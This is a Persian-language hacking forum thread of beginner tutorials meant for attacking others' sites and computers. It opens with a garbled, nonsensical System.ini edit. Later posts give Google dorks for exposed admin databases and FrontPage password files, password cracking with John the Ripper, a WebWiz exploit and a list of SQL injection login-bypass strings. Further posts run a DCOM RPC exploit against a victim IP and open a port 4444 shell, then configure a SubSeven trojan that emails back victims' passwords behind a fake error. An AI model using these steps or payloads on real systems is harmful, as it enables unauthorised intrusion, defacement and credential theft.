مقالاتی در زمینه هک

[Reza P30]

اول بگردين فايل System.ini رو پيدا کنيد . برای اين کار می تونيد از در ويندوز از سرج استفاده
کنيد ...
بعد اونو باز کنيد و دنبال [386enh] بگرديد ...
بعد اين دستورات رو بهش اضافه کنيد و به همين صورت سيو کنيد :
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON

البته مطالب بالا رو که گفتم شما به خاطر فارسی بودن صفحات برعکس ميبينيد که اگه تو پرونده مورد نظر کپی کنيد بايد سمت راست باشه !
البته متن را باید در خط بعد از [386enh] تایپ کنید یعنی به این صورت
[386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON
يا
386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
[woafont=dosapp.FON

[mahdi_kh71]

هک - قسمت اول


درس اول

هک چی بيده و هکر کی بيده؟هکر به کسی که از رايانه اطلاعاتی دارد و می تواند بدون اجازه وارد سيستم های کامپيوتری شود

چه چيزايي رو ياد بگيريم؟ اول از همه تی سی پی/آی پی دوم ويندوز 2000 و لينوکس

برای زنگ های تفريح بين درس ها من از مسايل هک غير مربوط استفاده می کنم مثلا آموزش داشتن اينترنت رايگان و اين جور مسايل

از تمامی عزيزانی که در زمينه ی هک يه جورايي (مثل من)هستن درخواست می شه به من کمک کنن حتی اگر اولين بارشونه که می هوان يه نفر رو هک کنن من به اونا هم کمک می کنم



درس دوم

اواين چيزی که يه هکر بايد بلد باشه پيدا کردنه آی پی طرف مقابله(برای کلاينت)پيدا کردن آی پی می تونه تو چت باشه و يا از طريق های ديگر ولی من چند نوع پيدا کردن آی پی رو به شما می گم حتما می پرسين آ پی چيه؟آی پی به آدرس هايي گفته می شود که در اينترنت کاربرد دارند مثلا داده ها در اينترنت از طريق همين آی پی ها منتقل می شه يعنی آی پی يه نوع آدرس اينترنتی است که در هر دفعه اتصال به اينترنت تغيير می کند و يه عددی مثل 125.124.23.26 اولين راهی که برای پيدا کردن آی پی به ذهن يه هکر در چت می افته استفاده از دستور زيره يعنی

netstat

خب وقتی اين دستور را در کامند پرومنت تايپ کنيد در صورتی که اينترنت قطع باشد نتايج زير حاصل می شود و اگر هم وصل باشد آی پی ها نمايش داده می شود

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\>netstat

Active Connections Proto Local Address Foreign Address State

در شکل اينترنت من قطع بوده است و می بينيد که هيچ آدرسی نمايش داده نمی شود ولی اگر اينترنت وصل بود و من هم در حال چت با فردی بودم آی پی او نمايش داده می شه ولی الان خالی هست خب پيدا کردن آی پی در چت رو گفتم اما چه جوری آی پی يه سايت رو پيدا کنيم برای اطن کار دو روش وجود داره اولی اينه که به سايت پينگ کنيم و دومی هم هوايز کردن سايت است که روش هر دو اين زير هست ولی برای تمامی سايت ها هوايز کردن بهتره چون نتيجه ی بهتری را در بر دارد

ping site name

روش بالا برای هر سايتی قابل استفاده است مثلا به مثال زير توجه کنيد

ping persianblog.com

دقت کنيد که ما نام سايت را وارد می کنيم و با استفاده از اين روش به نتايج زير رسيديم

pinging persianblog.com [xxx.yyy.zzz.nnn] with 32 bytes of data:

Reply from xxx.yyy.zzz.nnn bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=822ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=811ms TTL =111


Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms

می باشدxxx.yyy.zzz.nnnملاحظه می کنيد که آی پی پرشين بلاگ

برای روش دوم هم به مثال زير توجه کنيد

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از زدن اينتر اطلاعات زير نمايش داده می شود

whois -h magic xxx.yyy.zzz.nnn
sazin.com resolves toxxx.yyy.zzz.nnn

Trying whois -h whois.arin.net xxx.yyy.zzz.nnn
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255

# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN's Whois database.

در دو سطر اول آی پی طرف مقابل(سايت)مشخص می شود

سايت های معروف اين کار

whois.internic.net (The InterNIC)
whois.onlinenic.com (The OnLineNIC)
whois.arin.net (American Registry for Internet Numbers)
whois.ripe.net (European IP Address Allocations)
whois.apnic.net (European IP Address Allocations)
whois.nic.mil (US Military)
whois.nic.gov (US Government)

ولی همون اولی که مثال زدم از همه بهتره می گی نه نگاه کن
بعد اين می رسيم به پيدا کردن آی پی کلاينت برای اين کار چند روش وجود دارد که شما می توانيد يکی از اين روش ها را برگزينيد البته با ساب سون نيز می شود اما قبلا بايد او را هک
کرده باشيد جالا مراحل زير را دنبال کنين تا آخر
اولين راه فرستادن فايله که اول بايد از مهندسی اجتماعی استفاده کنيد تا به شما اعتماد کنه و گر نه که قيد اينو بزنين
در کامند پرومنت است که در بالا گفتم Netstat -n راه دوم نوشتن دستور
اين دستور بيشتر در چت کاربرد دارد
راه سوم هم زدن مخه يعنی سريش بازی در آوردن
و راه حل آخر هم که برای مسخره بازی نوشتم پرسيدن آی پی از طرفه(چقدر بامزه)مسخره بود نه
اگه کسی سوالی داره بگه من منتظرم

هک - قسمت دوم

درس سوم

قسمت قبلی رو که حتما خوندین !

بعد از اون چیزایی که در قسمت اول گفتم می رسيم به مشخص کردن پورت های باز بر روی سرور و يا کلاينت

برای اين کار چند روش وجود دارد ابتدا برای سايت ما می توانيم از دو روش معمول و معقولانه استفاده کنيم اين دو روش که در زير آمده است
برای اين است که ما ببينيم که پورت هايي که ما می خواهيم روی آن سرور باز است يا نه ؟ دستورش هم اين جوری بيدهtelnetاولين روش استفاده از
telnet site name port number
لابد می پرسيد که ديگه پورت چيه؟پورت به طور کلی به درگاه های ورودی و خروجی کامپيوتر گفته می شود که همه منطقی هستند و وجود خارجی ندارند در هر سيستم 65535 عددد پورت تی سی پی و 65535 عدد پورت يو دی پی وجود دارد که همه منطقی هستند(کامپيوتر چقدر منطقی هست)ليست پورت ها اين زير هست بخونينش براتون مفيده (هر کی بتونه همشونو حفظ کنه یه جایزه پیش من داره)

Ports TCP/UDP Service or Application
------- ------------ ---------- -- ----------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def

اگر بعد از خوندن قاطی کردین اشکالی نداره همه این طوری میشن !(حال همتونو می دونم) اما زیاد ناراحت یاد گیریه اینا هم نباشید . فعلا پورت های مهم برای ما پورت های 7، 15، 21، 23، 25، 79،80،110و119 هستند .
حالا دانلود کنا بیان جلو ! خب حالا می رسيم به مبحث تعيين پورت باز که يه نمونه رو گفتم حالا با استفاده از نرم افزار می خواهيم اين کار را بکنيم

Nmap

هر کی میخواد آدرس سایتشو بدونه دستشو ببره بالا [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]



درس چهارم

خب حالا ما اين اطلاعات رو پيدا کرديم با اينا چی کار کنيم؟
خب عزيزان(تحويلم بگيرين)بعد از استفاده از اون کاری که در درس قبل گفتم می رسيم به چگونگی استفاده از اين اطلاعات خب يه دور اين زيريا رو مرور کنين تا بعدش بهتون بگم :
در اين جور اطلاعات می توانيد قسمت های زير را بيابيد
نام شرکت
نام حوزه
آدرس آی پی
و يه سری اطلاعاتی که به درد ما نمی خوره(اين اطلاعات رو سايت می ده برين ببينين)در اينجا يه سری اطلاعات در مورد نام و اين جور مسايل داده می شه که زياد مورد استفاده قرار نمی گيره
در واقع مبحثی که من بالا مطرح کردم مبحث تکميلی درس قبل بود می دونين ديگه اما درس جديد از اينجا شروع می شه نه از اون جا حالا اينا رو هم بخونين ضرر نداره
اگه شما از اينترنيک استفاده کرديد که سط آخر نوشته دی اِن اِس و جلوش آدرس آی پی رو نوشته شما با استفاده از اون می تونين به ادامه ی کار بپردازيد اما چون اين سايت از همه راحت تر و در عين حال کامل تر بود براتون می گم خب حالا کار های زير رو روش انجام بدين و نتيجه رو ببينين
در خط دی اِن اِس سرور نام سرور ها نوشته شده است مثلا سرور1،سرور2 و ....حالا شما با استفاده از دستورات زير می تونين يه اطلاعات ديگری به دست بيارين حالا شروع می کنيم
کامنت پرومنت را باز کنيد و دستورات زير را درونش بنوسيد (یادتون نره خوش خط)

c:\>nslookup

با تايپ دستور زير نتايج زير حاصل می شود خودتون ببينيد
*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: xxx.yyy.zzz.nnn

<

دقت کنيد که علامت > را حتما داشته باشه بعد از اين کار هم دستو زير را تايپ کنين تا يه چيز جديد ياد بگيرين

server dns_server <

شما به جای دی اِن اِس_سرور نام دی اِن اِس سروری که در کار قبل ياد گرفتين و حتما انجام دادين را بزارين بعد از زدن اينتر نتايج زير حاصل می شود

Default Server: site name.com
Address: xxx.yyy.zzz.nnn

در جاهايي که سايت نيم نوشتم چون ممکنه تغيير بکنه برای همين همه رو يکی نوشتم
بعدش اينو بنويسين اگه خطا گرفت دوباره دستور را تايپ کنين و يا از يکی ديگه سروراستفاده کنين

set type=any <

حالا بستگی داره خطا بگيره يا نه اگه گرفت از بقيه اينا استفاده کنين اما اگه نگرفت اينا رو ادامه بدين

ls -d site_name <

و درآخر هم اينا رو گير ميارين حال بماند به چه کار ميان

[s1.site name.com]
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
site name.com. A xxx.yyy.zzz.nnn
site name.com. NS s1.site name.com
site name.com. NS s2.site name.com
site name.com. MX 10 mail.site name.com
site name.com. MX 15 site name.com
ftp CNAME xxx.yyy.zzz.nnn
www CNAME site name.com
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
<


درس پنجم


در درس بعدی (که خیلی توپه) در مورد کارکرد هر پورت و مسائل مربوط به ياهو مسنجر و کارت اينترنت رايگان (که البته هیچ کدوم از شما بهش علاقه ندارین)و اين جور مسائل توضيح می دم فقط يه نمه وقت می بره . اگه صبر کنين دارم يه ویژه نامه درباره شبکه و امنیت آن می نویسم که هر چی راجع به هک و کرک هم لازمه در بر می گیره . شما هم اگر بخواید می تونید کمکم کنید و همینطور از نظراتتون با اطلاعم کنید .

تا درس بعد همتون رو به خدا می سپارم . . . یا حق


ادغام شد.
Harry Potter

[iranhacker]

سلام
به عنوان اولین پستم در این انجمن میخوام حال اصاصی بدم و یاد بدم چجوری سایتهای خبری رو هک کنید.مراحلو همونجوری که میگم انجام بدید:
1-به گوگل برید و تایپ کنید: inurl:"/news/admin.htm
2-بعد از نمایش سایتها به صفحات آخر برید چون صفحات آخر اصیب پذیر ترن و از صفحات آخر یه سایتو انتخاب کنید
3-ساتی که مییاد آدرسش شبیه اینه: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] شما admin.htm رو پاک کن و به جاش بنویس news.mdb و اینتر کن بعد یه فایل شروع به دانلود شدن میکنه بزار دانلود بشه چون یوزر و پس ادمین سایت توشه.
4-دانلود که شد با نرم افزار اکسس مایکروسافت بازش کن و از قسمت تیبلها کانفیگوریشن رو انتخاب کن میبینی که یوزر و پسو بهت میده.
5- برو تو سایت یوزرو پسو بزن و حال کن
راستی این رو همه عملی نیست باید سعی کنی سایتهای اصیب پذیرو پیدا کنی مثلا تو گوگل بری صفحات آخر تا سایتهای آسیب پذیرو پیدا کنی

[iranhacker]

همونطوري که ميدونيد اخيرا يک باگ در WebWiz کشف شده.اين باگ توسط تيم ايراني با نام kapda کشف شده و اکسپلوييت اون هم توسط يکي از اعضاي اين گروه بانام devil_box نوشته شده.نسخه هاي آسيب پذير توسط اين اکسپلوييت :

webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions


ما براي نفوذ به سايتها بايد اين صفحه رو در اونا پيدا کنيم(سايتهايي که از WebWiz استفاده ميکنن)

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] [product]/check_user.asp

که با استفاده از گوگل به راحت ميتونيد با يه سرچ ساده اينکارو بکنيد.

خب حالا بايد اکسپلوييت اين باگ رو از اینجا دريافت کنيد.

فايل htm رو توسط notepad بازش کنيد و در اون به دنبال اين عبارت بگرديد :

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] [product]/check_user.asp

و به جاش آدرس صفحه مورد نظرتونو وارد کنيد.بعد save کنيد و با مرورگرتون باز کنيد صفحه htm رو.

حالا روي دکمه Submit کليک کنيد.اگه سايت patch شده باشه با يه error مواجه ميشيد.

خب ! کار نفوذ تموم شده.بقيش احتياج به توضيح نداره و با کمي ور ( var ) رفتن ميتونيد يه بلايي سر سايت بياريد.

از اين به بعد آموزش هايي اين وبلاگ رو ميخوام حرفه اي ترش کنم.

موفق باشيـــــــــــــــــــــ ـــــد

[iranhacker]

در اين آموزش شما مي آموزيد چگونه با يک سرچ قوي و سپس کرک کردن پسورد سايتها اقدام به نفوذ به سايت کنيد !

خب اول بايد به گوگل بريم و اين عبارت رو سرچ کنيم :

ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

(براي کپي کردن بالاعبارت بالا به قسمت نظرات همين بخش مراجعه کنيد)

خب الان واستون هزاران لينک اومده که ما ميتونيم اونا رو .....

حالا روي يکي از لينکها کيليک کنيد.بعدش واستون يه صفحه تکست باز ميشه که در اون يوزر و پسورد سايت به صورت encode شده در اومده و بايد ما آنرا decode کنيم.خب اينجاست که بايد برنامه john رو داشته باشيد و طرز استفادش رو هم بلد باشيد.اما من با اين حال طرز کارش رو توضيح ميدم.من در اينجا به عنوان مثال john رو در اين آدرس از کامپيوترم ريختم : C:\John

حالا من پسورد سايت رو در يه فايل تکست ذخيره ميکنم و توي اين آدرس قرار ميدم :C:\john\run

پس آدرس فايل پسورد به اين صورت در مياد : C:\john\run\pass.txt

حالا که فايل رو قرار دادم به cmd ميرم و : cd c:\john\run

بعدش : john.exe pass.txt

بعدش شروع ميکنه به کرک کردن که شما منتظر ميمونيد تا کرک کنه....

حالا به FrontPage ميريد و : File > Open Web

بعدش آدرس سايت مورد نظر رو مينويسيم . بعد از ما يوزر و پسورد ميخواد که ما بايد يوزر و پسي رو که کرک کرديم بهش بديم !

خب کار ديگه تموم شده .... از اينجا به بعدش ديگه واقعا احتياجي به توضيي نداره چون کنترل کامل سايت دست شماست.

در ضمن برای آموزش بعدی یه چیز خیلی توپ رو در نظر گرفتم...حتما سر بزنید.

موفق باشيد دوستان !

[iranhacker]

با سلام .امروز با استفاده از روشی ساده میخوام طرز هک کردن سایت رو بدم.فقط این نوع هک از نوع کیلوییه ! یعنی اینکه این جوریه که میرید یه عبارتو سرچ میکنید و بعد سایتهای که پیدا میشند رو میتونید هک کنید...

خب اول از همه شما باید برید اینو تو گوگل سرچ کنید : " login.asp "بعدش واستون کلی لینک میاره که شما باید سراغ لینکهایی برید که آدرسشون به این صورته : [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] .خلاصه آخرش باید صفحه لوگین باشه.یه پیشنهادیم که بهتون میکنم اونم اینکه بیخیال صفحات اول شید...چون این لینکای این صفحات اکثراْ patch شدند.حالا یکی از اون لینکارو باز کنید.توش که برید میبینید که یه قسمت داره که ازتون Username و Password میخواد.حالا به جای یوزر بزنید : admin و به جای پسورد یکی از چیزای زیر رو بزنید :

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

(چون انتخاب متن رو قفل کردم و شما نمیتونید کپی کنید کدهای بالا رو من این کدها رو توی قسمت نظرات همین پست نوشتم که میتونید از اونجا برداریدشون)

یه چیزی اونم اینکه همیشه نباید اینجوری بزنید بعضی وقتا توی همه یوزر و هم پسورد از یکی از حرفای بالا استفاده کنید.همون طوری که دیدید این یه روش خیلی سادس فقط به این هم توجه داشته باشید که اگه یه بار کارای بالا رو انجام دادید و لوگین نشدید بیخیا اینجا نشید.همون طوری که گفتم یه روش ابتکاریه.امتحان کنید حتما جواب میده ( اگه پچ نشده باشه )

یه چیز دیگه اونم اینکه بعضیا میان میپورسن : حالا فرضاْ ما لوگین شدیم.بعدش باید چیکار کنیم ؟ در جواب باید بگم که در این نوع هک شما بعد اینکه هک کردید باید برید دنبال گزینه هایی مثل : " درج خبر جدید " یا "Send New Post "و بعدش هم که اینجا رفتید دیگه کاملا مشخصه!یه جا باید متن خبر رو بنویسید و یه جا هم داره که تاریخ خبر و یه جا هم عنوان خبر و .... که مشخصه.

خب اینم تموم شد.تا آموزش بعدی خداحافظ

[iranhacker]

با استفاده از این مقاله شما میتوانید با بدست آوردن آیپی کلاینت به آن سیستم حمله کرده و با استفاده از باگ موجود در ویندوز اکس پی کنترل کامل سیستم قربانی را بدست بگیرید

از اینجا شروع میکنم که شما برای اینکار به ۲ چیز احتیاج دارید.۱-ایپی و دومی32 DCOM که میتونید اونو میتونید با سرچ تو گوگل پیدا کنید.خب حالا فایل رو بعد اینکه دانلود کردید در درایو ویندوز خود کپی کنید.یعنی :

X:\Documents and settings\"USER"\Here

به جای ایکس نام درایوی که ویندوز در آن ریخته شده و به جای یوزر نام یوزر ویندوز خود را بگزیرید و در همان جا کپی کنید.بعدش وارد cmd شید و بنویسید dcom32 .بعدش شکل زیر ظاهر میشه که من مطابق شمل توضیح میدم :

همونطوری که در شکل بالا هم میبینید الان داره از شما سوال میشه که ویندوز کسی که میخواید هک کنید و الای ایپی اونو دارید چیه؟خب در اینجا بهتون گفته شده که اگه ویندوز طرف :

Windows 2000 service pack 0=====>0

windows 2000 servise pack 1=====>1

windows 2000 servise pack 2 =====>2

&....

رو فشار بدید.الان مثلا کسی که من میخوام هک کنم از ویندوز XP servise pack 0 هست پس بنابراین من الان بره هک من باید از سوییچ ۵ استفاده کنم. همونطوری که در شکل هم میبیند باید این دستور رو وارد کنم:

یعنی: dcom32 5 217.218.166.135

خب بعد اینکه اینو تایپ کردید مطابق شکل بهتون گفته میشه که الان شما پورت ۴۴۴۴ رو رو سیستم قربانی باز کردید و گقته میشه که با نت کت به سیستم وصل شید و ... ولی چون نت کت هنوز بره اینکه اینجا اموزشش داده شه زوده شما میتونید به پورت ۴۴۴۴ طرف Telnet کنید ... که بره اون به run برید و بعد cmd رو تایپ کنید و بعد به این صورت:telnet 217.218.166.135 4444

بعدش شل سیستم طرف بره شما باز میشه و دیگه هر کاری که عشقتون میکشه میتونید رو سیستم بکنید.انشاالله اینکه با شل چیکار کنیدو براتون بعدن توضیح میدم چون اصلا بحثش جداست.خب امید وارم که اینایی که نوشتم به دردتون بخوره.پیشنهاد من به شما اینه که حتما این چیزایی رو که من در این مقاله و مقاله های قبلی گفتمو امتحان بکنید تا براتون جا بیفته.خب من دیگه برم.

منتظر مقالات من باشیـــــــــــــــــــــ ــــــــد ! با

[iranhacker]

پروتکل tcp/ip:اين پروتکل يکی از مهمترين و جزوء پر امنيت ترين پروتکل ها است و برا اساس روش تبديل داده ها به ديتاگرام است يعنی داده ها را به بسته های کوچکی تبديل کرده و آن را به صورت مستقل به مقصد می رساند و هر بسته حاوی آدرس فرستنده و گيرنده است.اين پروتکل بيشترين استفاده را در هک دارد
پروتکل http: اين پروتکل نيز جزء مهمترين پروتکل های ارتباطی است اين پروتکل که بر روی پورت ۸۰ سوار است قابليت stateless دارد و بدون هيچ تماسی بين کامپيوتر ميزبان و سرور است
پروتکل ftp:اين پروتکل برای فرستادن و گرفتن فايل به کار می رود اين پروتکل بر روی پورت ۲۱ سوار بوده و سعی می کند تا فايل ها را به صورت يک جا به مقصد ارسال کند
پروتکل usenet : اين پروتکل بيشتر برای سازمان های خصوصی و ارتباط ها جمعی بين گرو ههای خبری است
پروتکل gopher : اين پروتکل از نوع قديمی پروتکل http است و در اين نوع پروتکل کامپيوتر ميزبان می تواند به کامپيوتر سرور ارتباط بر قرار کرده و تبادل اطلاعات کند
پروتکل telnet: اين نوع پروتکل برای ورود به کامپيوتر های ديگر است اين پروتکل بر روی پورت ۲۳ سوار بوده و قابليت تعويض را نيز دارد.

[iranhacker]

ساب سون چيست؟ساب سون يکی از نرم افزارهای تارجان است که هنگامی برای فرد مورد نظر فرستاده می شود و شخص مورد نظر آن فايل را اجرا نمود پورتی به خصوص در کامپيوتر ان فرد باز نموده(backdoor)و آن پورت باز و شماره آی پی آن را برای شما ارسال می کند بعد از آن شما با نوشتن شما رهای فرستاده شده توسط کلينيت شما می تاونيد کامپيوتر آن فرد را در اختيار کامل بگيريد
آموزش کار :شما ابتدا نرم افزار را از اينجا دريافت نموده و در فايل ساب سون برنامه ی Edit server را اجرا نموده و در کادر باز شده In normal mode را انتخاب نموده و در پنجر ه ی باز شده notifection را انتخاب نموده و بر روی دکمه ی add email notify کليک کرده و در کادر باز شده ايميل خود را می نويسيد و دکمه ی ok را می زنيد بعد گزينه ی
email را انتخاب کرده و در بخش آن تمامی گزينه ها را فعال نموده و سپس در تمامی کادرها ايميل خود را می نويسيد تا هنگامی آن فرد فايل را باز نمود تمامی پسوردهايش برای شما ارسال گردد.و سپس گزينه ی exe icon/other را انتخاب نموده و گزينه ی enable fake error message را فعال کرده و در دکمه ی کنار آن يعنی configure error message کليک کرده و در پنجره ی باز شده در قسمت text پيغامی بنويسيد تا وقتی بر روی فايل فرد مورد نظر کليک کرد پيغامی که شما نوشته ايد نمايش دهد بعد پيغام را نوشته و بر روی دکمه ی ok کليک نموده و گزينه ی change icon server را فعال کرده و يکی از آيکن ها را انتخاب نماييد سپس بر روی دکمه ی ...save as کليک کرده و مقصدی را که می خواهيد اين فايلی که ساخته ايد در آنجا ذخيره شود را انتخاب نموده و سپس در قسمت file name نام مورد نظر خود را برای اين فايل به همراه پسوند exe. نوشته و سپس بر روی دکمه ی save کليک نموده و سپس فايل ساخته شده را برای شخص قربانی بفرسيد.سپس بعد از گذشت چند دقيقه که شخص فايل را دريافت نمود و ان را اجرا نمود شماره ی آی پی و ورت آن شخص برای شما فرستاده می شود بعد شما بايد برنامه ی sub7را اجرا کنيد و در قسمت ای ی ,ای پی شخص مورد نظر و در قسمت پورت , پورت شخص مورد نظر را نوشته و سپس بر روی دکمه ی coneect کليک نماييد حال شما به کامپيوتر شخص مورد نظر متصل شده ايد و می توانيد و در قسمت سمت چپ که اولين کلمه ی آن را shorcots نوشته می توانيد تمامی نقشه ها ی شيطانی و پست خود را روی شخص مورد نظر انجام دهيد مثل پاک کرده فايل های آن يا تحت اختيار گرفتن موس يا کيبورد ان شخص .اميدورام از درس امروز نيز خوشتان آمده باشد تا درس ديگر شما منتظر من بمانيد اما خودمونيم نامرد کسی است که نظر نده



خدانگهدارتان [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[iranhacker]

ما در دنيای اينترنت ۲ نوع پورت داريم يکی پورت فيزيکی و ديگری پورت مجازی

پورت فيزيکی: اين گونه پورت ها پورت هايی هستند که می توان آنها را لمس کرد و ديد

پورت مجازی:اين گونه پورت ها که از اسمشون معلوم است در دنيای مجازی است و ما نمی توانيم آنها را ببينيم که چه برسه بخواهيم لمسش کنيم

اما ما هکر ها برای هک کردن وب و اشخاص از پورت مجازی استفاده می کنيم و تعداد اين پورتها ۶۵۰۰۰تا است که از پورت Reserved tcp/0شروع و با پورت Devilخاتمه می يابد . ما برای هك كردن بايد يك يا چند پورت باز در كامپيوتر فرد ياوب مورد نظر پيدا كنيم تا بتوانيم از همان پورت باز به او حمله كنيم.ما برای به دست آوردن پورت های باز بايد از نرم افزار ها ی پورت اسكنر استفاده كنيم كه اين پورت اسكنر ها به دو دسته ‎ير قابل تشخيص و قابل تشخيص دسته بندی می شوند

پورت اسكنرها ی غير قابل تشخيص:اين پورت اسكنرها كه از اسمشان معلوم است قابل ردياببی نيستند چون اگر آی اس پی يا سايتی كه شما می خواهيد هكش كنيد بفهمد كه شما داريد پورت های آن را اسكن می كنيد كارت شما را قطع كند يا وقتی كه شما وب را هك كرديد بتوانند به راحتی به شما دسترسی داشته باشند من پيشنهاد می كنيم كه از اين پورت اسكنرها استفاده نماييد

پورت اسكنر های قابل تشخيص:اين پورت اسكنرها به راحتی قبل تشخيص بوده و شما اگر وبی را هك كنيد آنها می توانند به شما دسترسی داشته باشند

نكته: حالا بعضی ها كه دنبال مشهور شدن هستند از پورت اسكنر های قابل تشخيص استفاده می كنند تا بعد از هك جاي مورد نظر هنگامی كه آنها را گرفتند در تلويزيون از آنها به عنوان هكر سال شناخته بشود ام اين چه فايده ای دارد چون يه روز مشهور می شويد و در عوض ۱ يا ۱۰ سال بايد در زندان بمانيد و جريمه هايی كه تازه دولت برای هكرها تعيين كرده است را بپردازيد كه اين جريمه ها از ۵۰۰ هزار تومان است تا ۱۰ ميليون

حال می رويم برای چگونه پورت های باز را اسكن كنيم شما بايد ابتدا آدرس آی پی وب يا كامپيونر مورد نظر را در داخل يك اسكنر غير قابل تشخيص مثل nmap نوشته و در كادر ديگر آن تعداد پورت هايی كه می خواهيد اسكن كنيد را بنوسيد بعد به روی دكمه ی استارت كليك كرده تا نرم افزار اسكنر پورت های باز را به شما نشان دهد من در آخر اين درس نرم افزار nmap كه از طريق خط فرمان داس اجرا می شود را برای شما به دانلود گذاشته ام كه شما بتوانيد آن را دريافت و از ان استفاده نماييد

چگونگی اجرای برنامه ی nmap از طريق خط فرمان داس

ابتدا بر برنامه ی داس را اجرا كرده و نام درايوی كه برنامه ی nmap را در آنجا ذخيره كرده ايد وارد نماييد سپس نام فايل و نام برنامه را بنويسيد و بر روی دكمه ی اينتر بزيند مثال: مثلا من برنامه ی nmap ار در درايو e خود به نام فايل saiedhackerذخيره كرده ام پس من می روم و در داس چنين می نويسم

:e

cd saiedhacker

nmap

حال اگر بخواهيم از برنامه ی nmap راهنمايی بگيرم وقتی برنامه ی آن را اجرا كرديم می نويسيم

nmap -h

اميدوارم از درس امروز نيز خوشتان آمده باشد پس تا درس ديگر شما را به خدا می سپارم .

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

خداحافظ


ادغام شد.
Harry Potter